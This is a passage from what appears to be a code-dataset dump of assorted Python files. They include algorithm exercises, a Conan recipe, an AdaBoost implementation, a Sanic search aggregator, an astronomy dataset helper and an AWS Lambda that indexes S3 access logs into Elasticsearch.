D))\n\ninit_params = {'loc':0., 'scale':5.}\nq_theta, opt_data, save_path = M.epi(\n mu, \n arch_type='coupling', \n num_stages=num_stages,\n num_layers=num_layers,\n num_units=num_units,\n post_affine=False,\n batch_norm=False,\n init_params=init_params,\n K=10, \n num_iters=2500, \n N=1000,\n lr=1e-3, \n c0=1e-1, \n beta=10.,\n verbose=True,\n stop_early=True,\n log_rate=50,\n save_movie_data=True,\n)\nprint(\"EPI done.\")\nprint(\"Saved to %s.\" % save_path)\n","sub_path":"scripts/old/matrix_det_epi.py","file_name":"matrix_det_epi.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273737372","text":"f1 = open('dictionaryEasy.txt','w')\nf2 = open('dictionaryMed.txt','w')\nf3 = open('dictionaryHard.txt','w')\n\nwith open('dictionary.txt') as fp:\n\tfor line in fp:\n\t\tfor word in line.split():\n\t\t\tl = len(word)\n\t\t\tif l>=4 and l<=5:\n\t\t\t\tf1.write(word + '\\n')\n\t\t\telif l>=6 and l<=7:\n\t\t\t\tf2.write(word + '\\n')\n\t\t\telif l>=8 and l<=10:\n\t\t\t\tf3.write(word + '\\n')\n\nf1.close()\nf2.close()\nf3.close()\n","sub_path":"tmp/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345243776","text":"\nimport cv2\n\n\nclass Video_Reader():\n\n def __init__(self, video_path):\n\n self.video_path = video_path\n self.cap = cv2.VideoCapture(video_path)\n\n assert self.cap.isOpened(), \"Error opening video stream or file\"\n\n def __del__(self):\n self.cap.release()\n\n def reset(self):\n self.cap.release()\n self.cap = cv2.VideoCapture(self.video_path)\n assert self.cap.isOpened(), \"Error opening video stream or file\"\n\n return 0\n\n def get_frame(self):\n\n ret = False\n frame = None\n\n if (not self.cap.isOpened()):\n print('Video completed.')\n return (ret, frame)\n\n ret, frame = self.cap.read()\n\n return (ret, frame)\n\n","sub_path":"utils/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415457475","text":"\"\"\"\nПосчитать, сколько раз встречается определенная цифра в введенной\nпоследовательности чисел. Количество вводимых чисел и цифра, которую\nнеобходимо посчитать, задаются вводом с клавиатуры.\n\"\"\"\n\ncount = 0\n\nseq = input(\"Введите последовательность цифр: \")\ndigit = input(\"Введите искомую цифру: \")\n\nfor c in seq:\n if c == digit:\n count += 1\n\nprint(f\"Исковая цифра '{digit}' повторена в последовательности '{seq}' {count} раз\")","sub_path":"algorythms/lesson2/lesson_2_task8.py","file_name":"lesson_2_task8.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"35622984","text":"import sys\nimport string\nfrom collections import deque\n\n\nstates = [[], []]\ndQ = deque()\nnCannibals = 0\nnMissionaries = 0\nallowedOnBoat = 0\ncombinations = [ ]\n\n\ndef getCombindations():\n global allowedOnBoat, combinations\n\n for i in range(0,allowedOnBoat+1):\n for j in range(0,allowedOnBoat+1):\n if i+j>0 and i+j<=allowedOnBoat:\n combinations.append((i,j))\n\n\ndef initStates():\n global nCannibals, nMissionaries, states\n for i in range(0, nCannibals+1):\n states[0].append([])\n states[1].append([])\n for j in range(0, nMissionaries+1):\n states[0][i].append(-1)\n states[1][i].append(-1)\n\n\ndef validState(nCannibals, nMissionaries):\n return (nMissionaries>=nCannibals) or (nMissionaries==0) or (nCannibals==0)\n\n\ndef BFS():\n global dQ, states, nCannibals, mn, allowedOnBoat, combinations\n\n while (len(dQ) > 0) and states[1][nCannibals][nMissionaries] == -1:\n (x,y,depth,boat) = dQ.popleft()\n\n present = boat\n next = 1-boat\n\n if states[present][x][y] != -1:\n continue\n\n states[present][x][y] = depth\n\n for comb in combinations:\n (dx,dy) = comb\n\n if x>=dx and y>=dy:\n new_st = (nCannibals-(x-dx),nMissionaries-(y-dy),depth+1,next)\n (lx,ly) = (nCannibals-(x-dx),nMissionaries-(y-dy))\n (rx,ry) = (nCannibals-lx,nMissionaries-ly)\n\n if validState(lx, ly) and validState(rx, ry) \\\n and states[next][lx][ly] == -1:\n dQ.append(new_st)\n\n\n\ndef main():\n global dQ, nCannibals, nMissionaries, allowedOnBoat, combinations, states\n input_val = input().split()\n # input_val = input_val.split\n nCannibals = int(input_val[0])\n nMissionaries = int(input_val[1])\n allowedOnBoat = int(input_val[2])\n # print(input_val)\n initStates()\n getCombindations()\n\n dQ.append((nCannibals, nMissionaries, 0, 0))\n BFS()\n\n print(states[1][nCannibals][nMissionaries])\n # return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())","sub_path":"missionary_cannibals.py","file_name":"missionary_cannibals.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378288492","text":"#\r\nn = int(input())\r\na = list(map(int, input().split()))\r\nF = [0] * n\r\nfor i in range(n):\r\n for j in range(i):\r\n if a[i] % a[j] == 0 and F[j] > F[i]:\r\n F[i] = F[j]\r\n F[i] += 1\r\nprint(max(F))\r\n\r\n","sub_path":"BGQ.py","file_name":"BGQ.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"20092050","text":"def reverseWords(s):\n \"\"\"\n :type s: str\n :rtype: str\n\n idea:\n ' xx '\n FF, TF, TT, FT, FF\n \"\"\"\n prev = None\n isWord = False\n wasWord = False\n re = []\n s = ' ' + s + ' '\n for i, ch in enumerate(s):\n isWord = True if ch is not ' ' else False\n if not isWord and wasWord: #FT to append\n re.insert(0, s[prev:i])\n if isWord and not wasWord: #TF to update prev\n prev = i\n wasWord = isWord\n #re.reverse()\n return ' '.join(re)\n\nprint(reverseWords(\"the sky is blue\"))\nprint(reverseWords(\" the sky is blue \"))\n\n# Note .reverse() function changes obj locally\n# cannnot be a var in anotehr fuction, bc it return NoneType\n","sub_path":"Python/151_Reverse_Words_in_a_String.py","file_name":"151_Reverse_Words_in_a_String.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544533737","text":"import numpy as np\n\nfrom stingray.events import EventList\nfrom stingray.gti import join_gtis\nfrom model.table import Table\nimport bisect\nimport utils.dave_logger as logging\n\n\n# Returns an Stingray EventList from a given dataset\ndef get_eventlist_from_dataset(dataset, axis):\n\n if not is_events_dataset(dataset):\n logging.warn(\"get_eventlist_from_dataset: dataset is not a events dataset instance\")\n return None\n\n # Extract axis values\n time_data = np.array(dataset.tables[axis[0][\"table\"]].columns[axis[0][\"column\"]].values)\n pi_data = np.array(dataset.tables[axis[1][\"table\"]].columns[axis[1][\"column\"]].values)\n\n # Extract GTIs\n gti = get_stingray_gti_from_gti_table (dataset.tables[\"GTI\"])\n\n # Returns the EventList\n if len(gti) > 0:\n return EventList(time_data, gti=gti, pi=pi_data)\n else:\n return EventList(time_data, pi=pi_data)\n\n\ndef get_empty_gti_table():\n table = Table(\"GTI\")\n table.add_columns([\"START\", \"STOP\"])\n return table\n\n\ndef get_gti_table(from_val, to_val):\n table = get_empty_gti_table()\n table.columns[\"START\"].add_value(from_val)\n table.columns[\"STOP\"].add_value(to_val)\n return table\n\n\n# Finds the idx of the nearest value on the array, array must be sorted\ndef find_idx_nearest_val(array, value):\n\n # idx = np.searchsorted(array, value, side=\"left\")\n idx = bisect.bisect_left(array, value) #  Looks like bisec is faster with structured data than searchsorted\n\n if idx >= len(array):\n idx_nearest = len(array) - 1\n elif idx == 0:\n idx_nearest = 0\n else:\n if abs(value - array[idx - 1]) < abs(value - array[idx]):\n idx_nearest = idx - 1\n else:\n idx_nearest = idx\n return idx_nearest\n\n\ndef is_events_dataset(dataset):\n return is_hdu_dataset(dataset, \"EVENTS\")\n\n\ndef is_lightcurve_dataset(dataset):\n return is_hdu_dataset(dataset, \"RATE\")\n\n\ndef is_hdu_dataset(dataset, hduname):\n if dataset:\n if hduname in dataset.tables:\n if \"TIME\" in dataset.tables[hduname].columns:\n if \"GTI\" in dataset.tables:\n return True\n return False\n\n\ndef is_gti_dataset(dataset):\n if dataset:\n if \"GTI\" in dataset.tables:\n if \"START\" in dataset.tables[\"GTI\"].columns:\n return True\n return False\n\n\ndef get_events_dataset_start(dataset):\n if len(dataset.tables[\"EVENTS\"].columns[\"TIME\"].values) > 0:\n return dataset.tables[\"EVENTS\"].columns[\"TIME\"].values[0]\n return 0\n\n\ndef get_stingray_gti_from_gti_table (gti_table):\n return np.array([[a, b]\n for a, b in zip(gti_table.columns[\"START\"].values,\n gti_table.columns[\"STOP\"].values)],\n dtype=np.longdouble)\n\n\ndef get_gti_table_from_stingray_gti (gti):\n gti_table = get_empty_gti_table()\n gti_table.columns[\"START\"].add_values(gti[:, 0])\n gti_table.columns[\"STOP\"].add_values(gti[:, 1])\n return gti_table\n\n\ndef join_gti_tables(gti_table_0, gti_table_1):\n if not gti_table_0:\n logging.warn(\"join_gti_tables: gti_table_0 is None, returned gti_table_1\")\n return gti_table_1\n\n if not gti_table_1:\n logging.warn(\"join_gti_tables: gti_table_1 is None, returned gti_table_0\")\n return gti_table_0\n\n gti_0 = get_stingray_gti_from_gti_table (gti_table_0)\n gti_1 = get_stingray_gti_from_gti_table (gti_table_1)\n joined_gti = join_gtis(gti_0, gti_1)\n\n return get_gti_table_from_stingray_gti(joined_gti)\n\n\n# Returns a list of columns excluding passed columnName\ndef get_additional_column_names(columns, column):\n additional_columns = []\n for column_name in columns:\n if column_name != column:\n additional_columns.extend([column_name])\n return additional_columns\n\n\n# Returns a dictionary with the values of the table columns values\ndef get_columns_as_dict(columns, column):\n ds_columns = dict()\n for column_name in columns:\n if column_name != column:\n ds_columns[column_name] = columns[column_name].values\n return ds_columns\n\n\n# Returns a new dataset filtered by a GTI_Dataset\ndef get_dataset_applying_gti_dataset(src_dataset, gti_dataset, hduname=\"EVENTS\", column='TIME'):\n\n if not is_events_dataset(src_dataset):\n logging.warn(\"get_dataset_applying_gti_dataset: src_dataset is not a events dataset instance\")\n return None\n\n if not is_gti_dataset(gti_dataset):\n logging.warn(\"get_dataset_applying_gti_dataset: gti_dataset is not a gti dataset instance\")\n return None\n\n # Creates the new dataset\n dataset = src_dataset.clone(False)\n additional_columns = get_additional_column_names(dataset.tables[hduname].columns, column)\n hdu_table = src_dataset.tables[hduname]\n\n st_gtis = get_stingray_gti_from_gti_table(gti_dataset.tables[\"GTI\"])\n ev_list = hdu_table.columns[column].values\n ds_columns = get_columns_as_dict (src_dataset.tables[hduname].columns, column)\n\n # Gets start time of observation\n events_start_time = 0\n if \"TSTART\" in hdu_table.header:\n events_start_time = float(hdu_table.header[\"TSTART\"])\n\n gti_start = st_gtis[:, 0] - events_start_time\n gti_end = st_gtis[:, 1] - events_start_time\n\n update_dataset_filtering_by_gti (dataset.tables[hduname], dataset.tables[\"GTI\"],\n ev_list, ds_columns, gti_start, gti_end, additional_columns, column)\n return dataset\n\n\n# Returns a Dataset filtered by Gtis\ndef update_dataset_filtering_by_gti(hdu_table, gti_table, ev_list, ds_columns, gti_start, gti_end,\n additional_columns, column='TIME',\n filter_start=None, filter_end=None, must_filter=False):\n start_event_idx = 0\n end_event_idx = 0\n\n for gti_index in range(len(gti_start)):\n\n start = gti_start[gti_index]\n end = gti_end[gti_index]\n\n is_valid_gti = True\n if must_filter:\n is_valid_gti = ((filter_start <= start) and (filter_end >= end))\n if not is_valid_gti:\n if (filter_start < end) and (filter_end > end):\n start = filter_start\n is_valid_gti = True\n elif (filter_start < start) and (filter_end > start):\n end = filter_end\n is_valid_gti = True\n elif (filter_start >= start) and (filter_end <= end):\n start = filter_start\n end = filter_end\n is_valid_gti = True\n\n if is_valid_gti:\n start_event_idx = find_idx_nearest_val(ev_list, start)\n if (ev_list[start_event_idx] < start and start_event_idx < len(ev_list) - 1):\n start_event_idx = start_event_idx + 1\n\n end_event_idx = find_idx_nearest_val(ev_list, end)\n if (ev_list[end_event_idx] > end and end_event_idx > 0):\n end_event_idx = end_event_idx - 1\n\n if end_event_idx >= start_event_idx:\n # The GTI has ended, so lets insert it on dataset\n\n gti_table.columns[\"START\"].add_value(start)\n gti_table.columns[\"STOP\"].add_value(end)\n gti_table.columns[\"START_EVENT_IDX\"].add_value(start_event_idx)\n gti_table.columns[\"END_EVENT_IDX\"].add_value(end_event_idx)\n\n # Insert values at range on dataset\n hdu_table.columns[column].add_values(ev_list[start_event_idx:end_event_idx])\n for i in range(len(additional_columns)):\n ad_column=additional_columns[i]\n values=ds_columns[ad_column][start_event_idx:end_event_idx]\n hdu_table.columns[ad_column].add_values(values)\n\n else:\n logging.info(\"No data point in GTI # %s: GTI (from, to)=(%f, %f); event list (from, to)=(%d, %d)\" % (gti_index, start, end, start_event_idx, end_event_idx))\n","sub_path":"src/main/python/utils/dataset_helper.py","file_name":"dataset_helper.py","file_ext":"py","file_size_in_byte":7985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"128265614","text":"from sanic import Sanic, response\nimport asyncio\nimport concurrent.futures\nimport requests\nimport tweepy\nimport os\n\ntwitter_auth = tweepy.OAuthHandler('', '')\ntwitter_auth.set_access_token('', '')\ntwitter_api = tweepy.API(twitter_auth)\n\napp = Sanic()\n\nNO_RESULTS_JSON = {\"error\": -1, \"message\": \"No Results\"}\nRESULT_JSON = lambda x: {\"text\": x}\nTIMEOUT_JSON = {\"error\": -1, \"message\": \"execution timed out\"}\n\ndef get_google_result(q):\n res = requests.get(\"https://www.googleapis.com/customsearch/v1?key=&cx=011634103780127050272%3A8dm3slkgwwg&q={}&start=1&num=1\".format(q)).json()\n if res['items']:\n return RESULT_JSON(res['items'][0]['snippet'])\n return NO_RESULTS_JSON\n\ndef get_duckduckgo_result(q):\n res = requests.get(\"http://api.duckduckgo.com/?q={}&format=json\".format(q)).json()\n if res['RelatedTopics']:\n return RESULT_JSON(res['RelatedTopics'][0]['Text'])\n return NO_RESULTS_JSON\n\ndef get_twitter_result(q):\n res = twitter_api.search(q, count=1)\n if len(res):\n return RESULT_JSON(res.pop().text)\n return NO_RESULTS_JSON\n\n@app.route(\"/\")\nasync def home(request):\n q = request.args.get('q')\n res = {\"query\": q, \"google\": TIMEOUT_JSON, \"twitter\": TIMEOUT_JSON, \"duckduckgo\": TIMEOUT_JSON}\n with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:\n future_to_result = {\n executor.submit(engine['fun'], q): engine['engine'] for engine in [{\n \"engine\": \"google\",\n \"fun\": get_google_result\n }, {\n \"engine\": \"duckduckgo\",\n \"fun\": get_duckduckgo_result\n }, {\n \"engine\": \"twitter\",\n \"fun\": get_twitter_result\n }]\n }\n try:\n # As and when results are available push them into res[Response]. Timeout set to 1\n for future in concurrent.futures.as_completed(future_to_result, 1):\n engine = future_to_result[future]\n try:\n data = future.result()\n except Exception as exc:\n res[engine] = {\"error\": -1, \"message\": \"Something went wrong!\"}\n else:\n res[engine] = data\n except Exception as err:\n # In case of timeout timed out calls will continue to have the initial TIMEOUT_JSON. Ones that succeeded will have actual result.\n pass\n return response.json(res)\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=os.environ.get('PORT', 5000))\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"127592897","text":"# The prime 41, can be written as the sum of six consecutive primes:\n#\n# 41 = 2 + 3 + 5 + 7 + 11 + 13\n# This is the longest sum of consecutive primes that adds to a prime\n# below one-hundred.\n#\n# The longest sum of consecutive primes below one-thousand that adds\n# to a prime, contains 21 terms, and is equal to 953.\n#\n# Which prime, below one-million, can be written as the sum of the most\n# consecutive primes?\n\nfrom time import time\nimport sys\nsys.path.append(\"../Library\")\nfrom peresult import peresult\nfrom primefns import primesbelow\n\ndef solve(cap = 1000000):\n primes = primesbelow(cap)\n # Find max number of primes that, when concatenated, sum to less than cap\n initial_prime_sum = 0\n end_index = -1\n while initial_prime_sum + primes[end_index + 1] < cap:\n end_index += 1\n initial_prime_sum += primes[end_index]\n if initial_prime_sum in primes:\n return initial_prime_sum # This probably won't happen, but safety first\n for length in range(end_index + 1, 0, -1):\n # initial_prime_sum is the max sum below cap of primes with given length\n start_index = end_index - length + 1\n while initial_prime_sum - primes[start_index] + primes[end_index] < cap:\n initial_prime_sum += -primes[start_index] + primes[end_index]\n end_index += 1\n start_index += 1\n # Add a prime to the beginning and trim a prime from the end\n # Do this until either we run out of primes or the total is prime\n new_prime_sum = initial_prime_sum\n new_end_index = end_index\n new_start_index = start_index\n while new_prime_sum not in primes and new_start_index > 0:\n new_start_index -= 1\n new_end_index -= 1\n new_prime_sum += primes[new_start_index] - primes[new_end_index + 1]\n if new_prime_sum in primes:\n return new_prime_sum\n # No chains of given length sum to a prime. Trim one from the start\n initial_prime_sum -= primes[start_index]\n\nif __name__ == \"__main__\":\n start = time()\n peresult(50, solve(10 ** 6), time() - start)\n","sub_path":"Problems 1-100/p050_ConsecutivePrimeSum.py","file_name":"p050_ConsecutivePrimeSum.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627617583","text":"# Take 5 integer inputs from user and store them in a list.\n# Again ask user to give a number. Now, tell user whether that number is present in list or not.\n\nlst = []\n\nfor i in range(1,6):\n value = int(input(\"Enter {} number : \".format(i)))\n lst.append(value)\n\nsearch = int(input(\"Enter number to check present or not : \"))\n\nif search in lst:\n print(\"Present\")\nelse:\n print(\"Not Present\")","sub_path":"list_10.py","file_name":"list_10.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"564806795","text":"from conans import ConanFile, Meson, tools\nfrom conans.errors import ConanInvalidConfiguration\nimport os\n\nrequired_conan_version = \">=1.29.0\"\n\nclass LibnameConan(ConanFile):\n name = \"graphene\"\n description = \"A thin layer of graphic data types.\"\n topics = (\"conan\", \"graphene\")\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"http://ebassi.github.io/graphene/\"\n license = \"MIT\"\n generators = \"pkg_config\"\n\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"with_glib\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"with_glib\": True,\n }\n\n _source_subfolder = \"source_subfolder\"\n _build_subfolder = \"build_subfolder\"\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n if self.settings.compiler == \"gcc\":\n if tools.Version(self.settings.compiler.version) < \"5.0\":\n raise ConanInvalidConfiguration(\"graphene does not support GCC before 5.0\")\n \n def build_requirements(self):\n self.build_requires(\"meson/0.57.1\")\n self.build_requires(\"pkgconf/1.7.3\")\n \n def requirements(self):\n if self.options.with_glib:\n self.requires(\"glib/2.67.6\")\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n del self.settings.compiler.libcxx\n del self.settings.compiler.cppstd\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version])\n extracted_dir = self.name + \"-\" + self.version\n os.rename(extracted_dir, self._source_subfolder)\n\n def _configure_meson(self):\n meson = Meson(self)\n defs = {}\n defs[\"gobject_types\"] = \"true\" if self.options.with_glib else \"false\"\n if tools.Version(self.version) < \"1.10.4\":\n defs[\"introspection\"] = \"false\"\n else:\n defs[\"introspection\"] = \"disabled\"\n defs[\"tests\"] = \"false\"\n defs[\"installed_tests\"] = \"false\"\n defs[\"gtk_doc\"] = \"false\"\n args=[]\n args.append(\"--wrap-mode=nofallback\")\n meson.configure(defs=defs, build_folder=self._build_subfolder, source_folder=self._source_subfolder, pkg_config_paths=[self.install_folder], args=args)\n return meson\n\n def build(self):\n with tools.environment_append(tools.RunEnvironment(self).vars):\n meson = self._configure_meson()\n meson.build()\n\n def package(self):\n self.copy(pattern=\"LICENSE.txt\", dst=\"licenses\", src=self._source_subfolder)\n meson = self._configure_meson()\n with tools.environment_append({\"PKG_CONFIG_PATH\": self.install_folder}):\n meson.install()\n \n if self.settings.compiler == \"Visual Studio\" and not self.options.shared:\n with tools.chdir(os.path.join(self.package_folder, \"lib\")):\n if os.path.isfile(\"libgraphene-1.0.a\"):\n tools.rename(\"libgraphene-1.0.a\", \"graphene-1.0.lib\")\n \n tools.rmdir(os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n tools.remove_files_by_mask(self.package_folder, \"*.pdb\")\n\n def package_info(self):\n self.cpp_info.components[\"graphene-1.0\"].libs = [\"graphene-1.0\"]\n self.cpp_info.components[\"graphene-1.0\"].includedirs = [os.path.join(\"include\", \"graphene-1.0\"), os.path.join(\"lib\", \"graphene-1.0\", \"include\")]\n self.cpp_info.components[\"graphene-1.0\"].names[\"pkg_config\"] = \"graphene-1.0\"\n if self.options.with_glib:\n self.cpp_info.components[\"graphene-1.0\"].requires = [\"glib::gobject-2.0\"]\n\n if self.options.with_glib:\n self.cpp_info.components[\"graphene-gobject-1.0\"].includedirs = [os.path.join(\"include\", \"graphene-1.0\")]\n self.cpp_info.components[\"graphene-gobject-1.0\"].names[\"pkg_config\"] = \"graphene-gobject-1.0\"\n self.cpp_info.components[\"graphene-gobject-1.0\"].requires = [\"graphene-1.0\", \"glib::gobject-2.0\"]\n","sub_path":"recipes/graphene/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"430598435","text":"import pathlib\nimport pkg_resources\n\nfrom setuptools import setup\n\n# https://stackoverflow.com/a/59971469\nwith pathlib.Path('requirements.txt').open() as requirements_txt:\n content = '\\n'.join(filter(lambda line: not line.startswith('-i '), requirements_txt.read().split('\\n')))\n install_requires = [\n str(requirement) for requirement in pkg_resources.parse_requirements(content)\n ]\n\nsetup(\n name='Flask-Boto3',\n version='0.9.0',\n url='https://github.com/Ketouem/flask-boto3',\n license='MIT',\n author='Cyril \"Ketouem\" Thomas',\n author_email='ketouem@gmail.com',\n description='Flask extension that ties boto3 to the application',\n packages=['flask_boto3'],\n zip_safe=False,\n include_package_data=True,\n test_suite='tests',\n install_requires=install_requires,\n platforms='any',\n classifiers=[\n 'Environment :: Web Environment',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n 'Topic :: Software Development :: Libraries :: Python Modules'\n ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"132322119","text":"import numpy as np\n\n\ndef loadDataSet(fileName):\n numFeat = len(open(fileName).readline().split('\\t'))\n dataMat = []\n labelMat = []\n fr = open(fileName)\n for line in fr.readlines():\n curLine = line.strip().split('\\t')\n lineArr = []\n for i in range(numFeat - 1):\n lineArr.append(curLine[i])\n dataMat.append(lineArr)\n labelMat.append(curLine[-1])\n return dataMat, labelMat\n\n\ndef stumpClassify(dataMatrix, dimen, threshVal, threshIneq):#将数据进行阈值分类\n retArray = np.ones((np.shape(dataMatrix)[0], 1))\n if threshIneq == 'lt':\n retArray[dataMatrix[:, dimen] <= threshVal] = -1.0\n else:\n retArray[dataMatrix[:, dimen] > threshVal] = -1.0\n return retArray\n\n\ndef buildStump(dataArr, classLabels, D):\n dataMatrix = np.mat(dataArr)\n labelMat = np.mat(classLabels)\n m, n = np.shape(dataMatrix)\n numSetps = 10\n bestStump = {}\n bestClassEst = np.mat(np.zeros((m, 1)))\n minError = np.inf\n for i in range(n):\n rangeMin = dataMatrix[:, i].min()\n rangeMax = dataMatrix[:, i].max()\n stepSzie = (rangeMax - rangeMin) / numSetps\n for j in range(-1, int(stepSzie + 1)):\n for inequal in ['lt', 'gt']:\n threshVal = (rangeMin + float(j) * stepSzie)\n predictedVals = stumpClassify(dataMatrix, i, threshVal, inequal)\n errArr = np.mat(np.ones((m, 1)))\n errArr[predictedVals == labelMat] = 0\n weightedError = D.T*errArr\n if weightedError < minError:\n minError = weightedError\n bestClassEst = predictedVals.copy()\n bestStump['dim'] = i\n bestStump['thresh'] = threshVal\n bestStump['ineq'] = inequal\n return bestStump, minError, bestClassEst\n\n\ndef adaBoostTrainDS(dataArr, classLabels, numIter = 40):\n weakClassArr = []\n m, n = np.shape(dataArr)\n D = np.mat(np.ones((m, 1)) / m)\n aggClassEst = np.mat(np.zeros((m, 1)))\n for i in range(numIter):\n bestStump, error, classEst = buildStump(dataArr, classLabels, D)\n alpha = float(0.5*np.log((1-error) / max(error, 1e-16)))\n bestStump['alpha'] = alpha\n weakClassArr.append(bestStump)\n expon = np.multiply(-1*alpha*np.mat(classLabels).T, classEst) #????????????????\n D = np.multiply(D, np.exp(expon))\n D = D/sum(D)\n aggClassEst += alpha*classEst\n aggErrors = np.multiply(np.sign(aggClassEst) != classLabels.T, np.ones((m, 1)))\n errorRate = aggErrors.sum()/m\n if errorRate == 0.0:\n break\n return weakClassArr\n\ndef adaClassify(datToclass, classifierArr):\n dataMatrix = np.mat(datToclass)\n m = np.shape(dataMatrix)[0]\n aggClassEst = np.mat(np.zeros((m ,1)))\n for i in range(len(classifierArr)):\n classEst = stumpClassify(dataMatrix, classifierArr[i]['dim'], classifierArr[i]['thresh'], classifierArr[i]['ineq'])\n aggClassEst += classifierArr[i]['alpha']*classEst\n return np.sign(aggClassEst)\n\n\n\n\n\n\n","sub_path":"machine_learning/AdaBoost_单层决策树/myself_adaboost.py","file_name":"myself_adaboost.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"329040933","text":"from __future__ import print_function\n\nimport boto3\nimport re\nimport os\nimport json\nimport logging\nfrom datetime import datetime, date\nfrom botocore.awsrequest import AWSRequest\nfrom botocore.auth import SigV4Auth\nfrom botocore.endpoint import PreserveAuthSession\nfrom botocore.credentials import Credentials\nfrom botocore import exceptions as Botoxeption\n\n##################################################\n# Elasticsearch host name\nES_HOST = \"172.31.38.225:9200\"\n\n# Elasticsearch prefix for index name\nINDEX_PREFIX = \"s3_access_log\"\n\n#################################################\n# S3 access log format keys\nS3_KEYS = [\"owner_id\", \"bucket\", \"@timestamp\", \"client_ip\", \"requester\", \"request_id\", \"operation\",\n \"key\", \"request_uri\", \"http_status_code\", \"error_code\",\n \"bytes_send\", \"object_size\", \"total_time\", \"turn_around_time\", \"referrer\", \"user_agent\", \"version_id\"]\n\n# S3 access log format regex\nS3_REGEX = '(\\S+) (\\S+) \\[(.*?)\\s\\+0000\\] (\\S+) (\\S+) ' \\\n r'(\\S+) (\\S+) (\\S+) \"([^\"]+)\" ' \\\n r'(\\S+) (\\S+) (\\S+) (\\S+) (\\S+) (\\S+) ' \\\n r'\"([^\"]+)\" \"([^\"]+)\" (\\S+)'\n\nFMT_IN = '%d/%b/%Y:%H:%M:%S'\nFMT_OUT = '%Y-%m-%dT%H:%M:%S'\n\n#################################################\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nR = re.compile(S3_REGEX)\nINDEX = INDEX_PREFIX + \"-\" + datetime.strftime(datetime.now(), \"%Y.%m.%d\")\nTYPE = 'S3'\n\n\ndef lambda_handler(event, context):\n bucket = event[\"Records\"][0][\"s3\"][\"bucket\"][\"name\"]\n key = event[\"Records\"][0][\"s3\"][\"object\"][\"key\"]\n logger.debug('Got event{} for key {}'.format(json.dumps(event, indent=2), str(key)))\n\n try:\n logger.info('Get the s3 object: {}'.format(str(key)))\n s3 = boto3.client(\"s3\")\n obj = s3.get_object(\n Bucket=bucket,\n Key=key\n )\n except Botoxeption.ClientError as e:\n logger.error('something got wrong: {}'.format(str(e)))\n\n logger.info('extract body')\n body = obj[\"Body\"].read()\n data = \"\"\n\n for line in body.strip().split(\"\\n\"):\n match = R.match(line)\n if not match:\n logger.error('no match for: {}'.format(str(line)))\n continue\n\n values = match.groups(0)\n doc = dict(zip(S3_KEYS, values))\n\n doc[S3_KEYS[2]] = transform_timestamp(doc[S3_KEYS[2]])\n\n # to avoid any type parsing errors for number fields in ES, let's change '-' to 0\n for key, value in doc.iteritems():\n if key in [\"bytes_send\", \"object_size\", \"total_time\", \"turn_around_time\"]:\n if value == '-':\n logger.debug('Found \\'-\\' for key: {}, replacing with 0'.format(key))\n doc[key] = '0'\n\n data += '{\"index\":{\"_index\":\"' + INDEX + '\",\"_type\":\"' + TYPE + '\"}}\\n'\n data += json.dumps(doc) + \"\\n\"\n logger.debug('a json doc in all its glory: {}'.format(str(json.dumps(doc))))\n\n if len(data) > 1000000:\n _bulk(ES_HOST, data)\n data = \"\"\n\n if data:\n _bulk(ES_HOST, data)\n\n\ndef _bulk(host, doc):\n credentials = _get_credentials()\n url = _create_url(host, \"/_bulk\")\n response = es_request(url, \"POST\", credentials, data=doc)\n logger.info('ingest to es: {}'.format(str(response.text)))\n if not response.ok:\n logger.error('Response Error: {}'.format(str(response.text)))\n\n\ndef transform_timestamp(timestamp):\n d = datetime.strptime(timestamp, FMT_IN)\n return date.strftime(d, FMT_OUT)\n\n\ndef _get_credentials():\n return 